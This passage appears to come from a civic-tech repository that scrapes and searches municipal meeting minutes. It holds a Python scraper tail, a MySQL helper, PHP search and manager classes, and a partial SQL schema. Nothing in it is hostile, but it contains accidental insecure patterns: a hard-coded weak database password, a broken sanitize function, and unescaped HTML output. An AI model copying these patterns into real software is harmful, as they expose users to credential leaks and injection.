getlinks(urlid,url,siteurl,baseurl)\n\n        report(\"info\",\"Working on {0} Links from `{1}`\".format(len(links),url))\n\n        for link,linkname in links:\n            report(\"info\",\"Working on URL `{0}`\".format(link))\n            success,filename = downloadlink(link)\n            if success == False:\n                report(\"error\",\"Bad Link Found, Skipping.\\n\")\n                continue\n            success,pdftext,texthash = decodepdf(filename)\n            if success == True:\n                docdate = getdocdate(pdftext[:HEADERLENGTH])\n                #docname = getdocname(pdftext[:HEADERLENGTH])\n                docname = linkname\n                pdftextscrubbed = scrubtext(pdftext)\n                _tokens = nltk.word_tokenize(pdftextscrubbed)\n                tokens = nltk.FreqDist(word.lower() for word in _tokens)\n                success,suborgid = getsuborg(pdftext[:HEADERLENGTH],orgid)\n                if success == True:\n                    report(\"info\",\"Adding Doc and Word Histogram Data to Database.\")\n                    docid = savedoc(suborgid,orgid,link,docdate,docname,texthash,pdftext,tokens,False)\n                    report(\"info\",\"Successfully Parsed And Added Document #{0}\\n\".format(docid))\n                else:\n                    report(\"error\",\"Unable to Decode Suborganization from PDF document.\")\n                    report(\"info\",\"Adding Doc and Word Histogram Data to Database as Orphan.\")\n                    docid = savedoc(suborgid,orgid,link,docdate,docname,texthash,pdftext,tokens,True)\n                    report(\"info\",\"Adding `{0}` to orphan list.\\n\".format(link))\n            else:\n                report(\"warning\",\"Unable to Parse PDF Into Text.\")\n                report(\"info\",\"Adding `{0}` to ignore list.\\n\".format(link))\n                addignore(link,urlid)\n            os.remove(filename)\n\n    print \"\\nApplication Exiting ...\\n\"\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n"
},
{
"alpha_fraction": 0.5640449523925781,
"alphanum_fraction": 0.5647940039634705,
"avg_line_length": 33.675323486328125,
"blob_id": "f2910a9a84544aa46dc1618dacb7577bae75038d",
"content_id": "5fa140798a2a75287d02ed3659711d141af84bcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2670,
"license_type": "no_license",
"max_line_length": 318,
"num_lines": 77,
"path": "/scripts/runs.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import MySQLdb as mdb\nimport _mysql as mysql\nimport re\n\nclass runs:\n\n __settings = {}\n __con = False\n\n def __init__(self):\n configfile = \"sqlcreds.txt\"\n f = open(configfile)\n for line in f:\n # skip comment lines\n m = re.search('^\\s*#', line)\n if m:\n continue\n\n # parse key=value lines\n m = re.search('^(\\w+)\\s*=\\s*(\\S.*)$', line)\n if m is None:\n continue\n\n self.__settings[m.group(1)] = m.group(2)\n f.close()\n\n # create connection\n self.__con = mdb.connect(host=self.__settings['host'], user=self.__settings['username'], passwd=self.__settings['password'], db=self.__settings['database'])\n\n def __sanitize(self,valuein):\n if type(valuein) == 'str':\n valueout = mysql.escape_string(valuein)\n else:\n valueout = valuein\n return valuein\n\n def add(self,rundt,scrapername,successful,organizationid,suborganizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"INSERT INTO runs(rundt,scrapername,successful,organizationid,suborganizationid) VALUES(%s,%s,%s,%s,%s)\",(self.__sanitize(rundt),self.__sanitize(scrapername),self.__sanitize(successful),self.__sanitize(organizationid),self.__sanitize(suborganizationid)))\n cur.close()\n newid = cur.lastrowid\n return newid\n\n def get(self,runid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM runs WHERE runid = %s\",(runid))\n row = cur.fetchone()\n cur.close()\n\n def getall(self):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM runs\")\n rows = cur.fetchall()\n cur.close()\n\n _runs = []\n for row in rows:\n _runs.append(row)\n\n return _runs\n\n def delete(self,runid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"DELETE FROM runs WHERE runid = %s\",(runid))\n cur.close()\n\n def update(self,runid,rundt,scrapername,successful,organizationid,suborganizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"UPDATE runs SET rundt = %s,scrapername = %s,successful = %s,organizationid = %s,suborganizationid = %s WHERE runid = %s\",(self.__sanitize(rundt),self.__sanitize(scrapername),self.__sanitize(successful),self.__sanitize(organizationid),self.__sanitize(suborganizationid),self.__sanitize(runid)))\n cur.close()\n\n##### Application Specific Functions #####\n"
},
{
"alpha_fraction": 0.5473799109458923,
"alphanum_fraction": 0.5502183437347412,
"avg_line_length": 27.27777862548828,
"blob_id": "ad07e88f0732dbd1f804b3e3c2706396a3724456",
"content_id": "b2bfcd4cdd8ff8ba15c0e1545b77a291dc42676b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4580,
"license_type": "no_license",
"max_line_length": 237,
"num_lines": 162,
"path": "/web/search.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"_header.php\");\n?>\n\n\t<script src=\"http://code.jquery.com/jquery-latest.js\"></script>\n\t\n\t<script type=\"text/javascript\">\n\t</script>\n\n\t<div class=\"searchwrapper\">\n\t\t<form name=\"input\" action=\"search.php\" method=\"get\">\n\n\t\t\t<div class=\"searchbox\">\n\t\t\t\tEnter a Search Term</br>\n\t\t\t\t<input type=\"text\" id=\"keyword\" name=\"keyword\" size=\"80\" value=\"\"></br>\n\t\t\t</div>\n\t\t\t\n\t\t\t<div class=\"orgselectbox\">\n\t\t\t\tSelect a Specific Organization</br>\n\t\t\t\t<select id=\"organization\" name=\"organization\">\n\t\t\t\t\n\t\t\t\t\t<?php\n\t\t\t\t\t\n\t\t\t\t\t\trequire_once(\"./tools/OrganizationsManager.class.php\");\n\t\t\t\t\t\t\n\t\t\t\t\t\t$orgmgr = new OrganizationsManager();\n\t\t\t\t\t\t$orgs = $orgmgr->getall();\n\t\t\t\t\t\tforeach($orgs as $org)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\techo '<option value=\"' . $org->organizationid . '\">' . $org->name . '</option>\\n';\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t?>\n\t\t\t\t\n\t\t\t\t</select>\n\t\t\t</div>\n\t\t\t\n\t\t\t<div class=\"smallpadding\">\n\t\t\t\t<input type=\"submit\" id=\"search\" value=\"Search\"></br>\n\t\t\t</div>\n\t\t\t\n\t\t</form>\n\t</div>\n\n\t<div class=\"searchwrapper\">\n\n\t\t<div id=\"searchresults\" class=\"searchresults\">\n\t\t\n\t\t\t<?php\n\t\t\t\n\t\t\t\t// see if we actually are performing a search\n\t\t\t\tif( isset($_GET['keyword']) && isset($_GET['organization']) )\n\t\t\t\t{\n\t\t\t\t\t\n\t\t\t\t\t// decode page number, if set\n\t\t\t\t\tif( isset($_GET['page']) )\n\t\t\t\t\t{\n\t\t\t\t\t\t$page = intval($_GET['page']);\n\t\t\t\t\t\tif( $page < 1 )\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$page = 1;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t$page = 1;\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\t// decode search term and org id\n\t\t\t\t\t$keyword = $_GET['keyword'];\n\t\t\t\t\t$organizationid = $_GET['organization'];\n\t\t\t\n\t\t\t\t\t//echo \"Searching for '\" . $keyword . \"' within org #\" . $organizationid . \", returning page #\" . $page . \" ...</br>\";\n\t\t\t\n\t\t\t\t\trequire_once(\"./tools/WordsManager.class.php\");\n\t\t\t\t\trequire_once(\"./tools/DocumentsManager.class.php\");\n\t\t\t\t\trequire_once(\"./tools/SuborganizationsManager.class.php\");\n\t\t\t\t\t\n\t\t\t\t\t$docmgr = new DocumentsManager();\n\t\t\t\t\t$wordsmgr = new WordsManager();\n\t\t\t\t\t$sorgmgr = new SuborganizationsManager();\n\t\t\t\t\t\n\t\t\t\t\t//echo \"Organization ID = \" . $organizationid . \"<br>\";\n\t\t\t\t\t//echo \"Keyword = \" . $keyword . 
\"<br>\";\n\t\t\t\t\t\n\t\t\t\t\t$retwords = $wordsmgr->search($organizationid,$keyword,$page);\n\t\t\t\t\t$wordcount = $wordsmgr->getcount($organizationid, $keyword);\n\t\t\t\t\n\t\t\t\t\t// get the docs\n\t\t\t\t\t$docs = array();\n\t\t\t\t\tforeach($retwords as $retword)\n\t\t\t\t\t{\n\t\t\t\t\t\t$doc = $docmgr->get($retword->documentid);\n\t\t\t\t\t\t$docs[] = $doc;\n\t\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\t/*\n\t\t\t\t\t// create words array\n\t\t\t\t\t$words = array();\n\t\t\t\t\tforeach($retword as $word)\n\t\t\t\t\t{\n\t\t\t\t\t\t$words[$word->word] = (object) array('documentid' => $word->documentid, 'frequency' => $word->frequency);\n\t\t\t\t\t}\n\t\t\t\t\t*/\n\t\t\t\t\t\n\t\t\t\t\t// create suborg dictionary\n\t\t\t\t\t$suborgs = $sorgmgr->getall();\n\t\t\t\t\t$suborgdict = array();\n\t\t\t\t\tforeach($suborgs as $suborg)\n\t\t\t\t\t{\n\t\t\t\t\t\t$suborgdict[$suborg->suborganizationid] = (object) array( 'name' => $suborg->name, 'websiteurl' => $suborg->websiteurl );\n\t\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\t//echo \"Count = \" . $wordcount . \"<br>\";\n\t\t\t\t\n\t\t\t\t\t//echo json_encode($retwords);\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t$start = (($page - 1) * 10)+1;\n\t\t\t\t\tif( $start + 9 > $wordcount )\n\t\t\t\t\t\t$end = $wordcount;\n\t\t\t\t\telse\n\t\t\t\t\t\t$end = $start + 9;\n\t\t\t\t\t\n\t\t\t\t\techo '<div class=\"srtop\">';\n\t\t\t\t\t\n\t\t\t\t\techo '<a href=\"' . $suborgdict[$doc->suborganizationid]->websiteurl . '\">' . $suborgdict[$doc->suborganizationid]->name . '</a>';\n\t\t\t\t\t\n\t\t\t\t\tif( $wordcount == 1 )\n\t\t\t\t\t\techo '<div class=\"srcounts\"><div class=\"righttext\">Displaying 1 total result.</div></div>';\n\t\t\t\t\telse\n\t\t\t\t\t\techo '<div class=\"srcounts\"><div class=\"righttext\">Displaying ' . $start . ' to ' . $end . ' of ' . $wordcount . ' total results.</div></div>';\n\n\t\t\t\t\techo \"</div>\\n\";\n\t\t\t\t\n\t\t\t\t\t// print all of the results to the page\n\t\t\t\t\tforeach($docs as $doc)\n\t\t\t\t\t{\n\t\t\t\t\t\techo '<div class=\"searchresult\">';\n\t\t\t\t\t\techo '<div class=\"srheader\"><a href=\"' . $doc->sourceurl . '\">' . $doc->name . '</a> - ' . $doc->documentdate . '</div>';\n\t\t\t\t\t\techo '<div class=\"srurlheader\">' . $doc->sourceurl . '</div></br>';\n\t\t\t\t\t\techo '<div class=\"srpreviewtext\">\"... that the floor plan for this house is identical to the last one the Planning Board approved. He passed around a sample of the exterior color, which members agreed was aesthetically ...\"</div>';\n\t\t\t\t\t\t//echo '<div class=\"srsubheader\"><a href=\"' . $suborgdict[$doc->suborganizationid]->websiteurl . '\">' . $suborgdict[$doc->suborganizationid]->name . '</a></div>';\n\t\t\t\t\t\techo \"</div>\\n\\n\";\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t//echo \"Looks like there was an error, try reloading the page.\";\n\t\t\t\t}\n\t\t\t?>\n\t\t\t\n\t\t</div>\n\n\t</div>\n\n<?php\n\trequire_once(\"_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5906432867050171,
"alphanum_fraction": 0.5912002325057983,
"avg_line_length": 27.95967674255371,
"blob_id": "a50d7cad73c932d2c6998b3956757f26dfc4bf7e",
"content_id": "2c207c162ca550b970026ae5ce770ec70f249608",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3591,
"license_type": "no_license",
"max_line_length": 278,
"num_lines": 124,
"path": "/web/tools/UsersManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass UsersManager\n\t{\n\t\tfunction add($username,$passwordhash,$displyname,$emailaddress,$verificationcode,$verified)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO users(username,passwordhash,displyname,emailaddress,verificationcode,verified) VALUES(?,?,?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssssss\", $username,$passwordhash,$displyname,$emailaddress,$verificationcode,$verified);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('userid' => $row['userid'],'username' => $row['username'],'passwordhash' => $row['passwordhash'],'displyname' => $row['displyname'],'emailaddress' => $row['emailaddress'],'verificationcode' => $row['verificationcode'],'verified' => $row['verified']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($userid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM users WHERE userid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $userid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('userid' => $row['userid'],'username' => $row['username'],'passwordhash' => $row['passwordhash'],'displyname' => $row['displyname'],'emailaddress' => $row['emailaddress'],'verificationcode' => $row['verificationcode'],'verified' => $row['verified']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM users';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('userid' => $row['userid'],'username' => $row['username'],'passwordhash' => $row['passwordhash'],'displyname' => $row['displyname'],'emailaddress' => $row['emailaddress'],'verificationcode' => $row['verificationcode'],'verified' => $row['verified']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($userid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM users WHERE userid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $userid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . 
$e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($userid,$username,$passwordhash,$displyname,$emailaddress,$verificationcode,$verified)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE users SET username = ?,passwordhash = ?,displyname = ?,emailaddress = ?,verificationcode = ?,verified = ? WHERE userid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssssss\", $username,$passwordhash,$displyname,$emailaddress,$verificationcode,$verified, $userid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.614052951335907,
"alphanum_fraction": 0.6145620942115784,
"avg_line_length": 30.677419662475586,
"blob_id": "2231e8d64c509565de67e6013c97d955a6f8978c",
"content_id": "5295dac1cc3933de78a9b8d5179120d43b3a985c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3928,
"license_type": "no_license",
"max_line_length": 325,
"num_lines": 124,
"path": "/web/tools/SuborganizationsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass SuborganizationsManager\n\t{\n\t\tfunction add($organizationid,$name,$parsename,$websiteurl,$documentsurl,$scriptname,$dbpopulated)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO suborganizations(organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated) VALUES(?,?,?,?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssssss\", $organizationid,$name,$parsename,$websiteurl,$documentsurl,$scriptname,$dbpopulated);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'name' => $row['name'],'parsename' => $row['parsename'],'websiteurl' => $row['websiteurl'],'documentsurl' => $row['documentsurl'],'scriptname' => $row['scriptname'],'dbpopulated' => $row['dbpopulated']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($suborganizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM suborganizations WHERE suborganizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $suborganizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'name' => $row['name'],'parsename' => $row['parsename'],'websiteurl' => $row['websiteurl'],'documentsurl' => $row['documentsurl'],'scriptname' => $row['scriptname'],'dbpopulated' => $row['dbpopulated']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM suborganizations';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'name' => $row['name'],'parsename' => $row['parsename'],'websiteurl' => $row['websiteurl'],'documentsurl' => $row['documentsurl'],'scriptname' => $row['scriptname'],'dbpopulated' => $row['dbpopulated']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($suborganizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM suborganizations WHERE suborganizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $suborganizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . 
$e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($suborganizationid,$organizationid,$name,$parsename,$websiteurl,$documentsurl,$scriptname,$dbpopulated)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE suborganizations SET organizationid = ?,name = ?,parsename = ?,websiteurl = ?,documentsurl = ?,scriptname = ?,dbpopulated = ? WHERE suborganizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssssssss\", $organizationid,$name,$parsename,$websiteurl,$documentsurl,$scriptname,$dbpopulated, $suborganizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.6023908257484436,
"alphanum_fraction": 0.6042099595069885,
"avg_line_length": 28.60769271850586,
"blob_id": "db65aa7b7f074f776210294aed88a311864202c3",
"content_id": "510940d33e592b0e5b23305beb797e9559367194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3848,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 130,
"path": "/web/tools/old/SearchManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\n\trequire_once(\"DatabaseTool.class.php\");\n\t\n\tclass SearchManager\n\t{\n\t\n\t\tfunction GetSearchResultCount($searchterm, $organizationid)\n\t\t{\n\t\t\tdprint( \"GetSearchResultCount() Start.\" );\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool();\n\t\t\t\n\t\t\t\t$query = 'select count(documents.documentid) as count ';\n\t\t\t\t$query = $query . 'from documents ';\n\t\t\t\t$query = $query . 'inner join words on words.documentid = documents.documentid ';\n\t\t\t\t$query = $query . 'inner join organizations on documents.organizationid = organizations.organizationid ';\n\t\t\t\t$query = $query . 'inner join suborganizations on documents.suborganizationid = suborganizations.suborganizationid ';\n\t\t\t\t$query = $query . 'where documents.organizationid = ? and words.word = ?';\n\t\t\t\t\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ss\", $organizationid,$searchterm);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$count = count($results);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\t\n\t\t\tdprint(\"GetSearchResultCount() Done.\");\n\t\t\t\n\t\t\treturn $count;\n\t\t}\n\t\n\t\tfunction PerformSearch($searchterm, $organizationid, $page)\n\t\t{\n\t\t\tdprint( \"PerformSearch() Start.\" );\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool();\n\t\t\t\n\t\t\t\t$query = 'select documents.name as docname, documents.scrapedate as scrapedate, documents.documentdate as documentdate, documents.sourceurl as sourceurl, ';\n\t\t\t\t$query = $query . 'organizations.name as orgname, ';\n\t\t\t\t$query = $query . 'suborganizations.name as suborgname, suborganizations.websiteurl as websiteurl ';\n\t\t\t\t$query = $query . 'from documents ';\n\t\t\t\t$query = $query . 'inner join words on words.documentid = documents.documentid ';\n\t\t\t\t$query = $query . 'inner join organizations on documents.organizationid = organizations.organizationid ';\n\t\t\t\t$query = $query . 'inner join suborganizations on documents.suborganizationid = suborganizations.suborganizationid ';\n\t\t\t\t$query = $query . 'where documents.organizationid = ? and words.word = ? order by documents.documentdate limit 10 offset ?';\n\t\t\t\t\n\t\t\t\t//echo $query;\n\t\t\t\t\n\t\t\t\tif( $page > 1 )\n\t\t\t\t\t$limit = \"offset \" . intval( ($page-1) * 10 );\n\t\t\t\telse\n\t\t\t\t\t$limit = 0;\n\t\t\t\t\t\n\t\t\t\t//echo \"-- \" . $limit . 
\" --\";\n\t\t\t\t\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $organizationid,$searchterm,$limit);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$searchresults = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$searchresult = (object) array( 'docname' => $row['docname'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'scrapedate' => $row['scrapedate'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'documentdate' => $row['documentdate'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'sourceurl' => $row['sourceurl'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'orgname' => $row['orgname'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'suborgname' => $row['suborgname'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'websiteurl' => $row['websiteurl']\n\t\t\t\t\t\t\t\t\t\t\t\t );\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t$searchresults[] = $searchresult;\n\t\t\t\t}\n\t\n\t\t\t\t$this->RecordSearch($searchterm,$organizationid);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\t\n\t\t\tdprint(\"PerformSearch() Done.\");\n\t\t\t\n\t\t\treturn $searchresults;\n\t\t}\n\t\n\t\tfunction RecordSearch($searchterm,$organizationid)\n\t\t{\n\t\t\tdprint( \"RecordSearch() Start.\" );\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool();\n\t\t\t\n\t\t\t\t$datetime = date(\"Y-m-d H:i:s\");\n\t\t\t\n\t\t\t\t$query = 'INSERT INTO searches(searchterm,searchdt,organizationid) values(?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $searchterm,$datetime,$organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\t\n\t\t\tdprint(\"RecordSearch() Done.\");\n\t\t}\n\t\n\t}\n\n?>"
},
{
"alpha_fraction": 0.7156004905700684,
"alphanum_fraction": 0.7438141107559204,
"avg_line_length": 37.52325439453125,
"blob_id": "8d8750055d19cb5cdab3bdba6c7d5ff07e39a5a0",
"content_id": "8f4e6f567fc714441d0a8940ca5bf73a2f44c348",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 6628,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 172,
"path": "/db/create_db.sql",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "drop database monroeminutesdb;\ncreate database monroeminutesdb;\n\ngrant usage on monroeminutesdb.* to mmuser identified by 'password123%%%';\n\ngrant all privileges on monroeminutesdb.* to mmuser;\n\nuse monroeminutesdb;\n\ncreate table users(\nuserid int not null auto_increment primary key,\nusername varchar(255) not null,\npasswordhash varchar(255) not null,\ndisplyname varchar(255) not null,\nemailaddress varchar(255) not null,\nverificationcode varchar(255) not null,\nverified bool not null\n);\n\ncreate table permissions(\npermissionid int not null auto_increment primary key,\nisadmin bool not null,\ncanlogin bool not null\n);\n\ncreate table actions(\nactionid int not null auto_increment primary key,\nuserid int not null,\nforeign key (userid) references users(userid),\nactiontype varchar(255) not null,\npagename varchar(255) not null,\ndescription text not null\n);\n\ncreate table organizations(\norganizationid int not null auto_increment primary key,\nname varchar(255) not 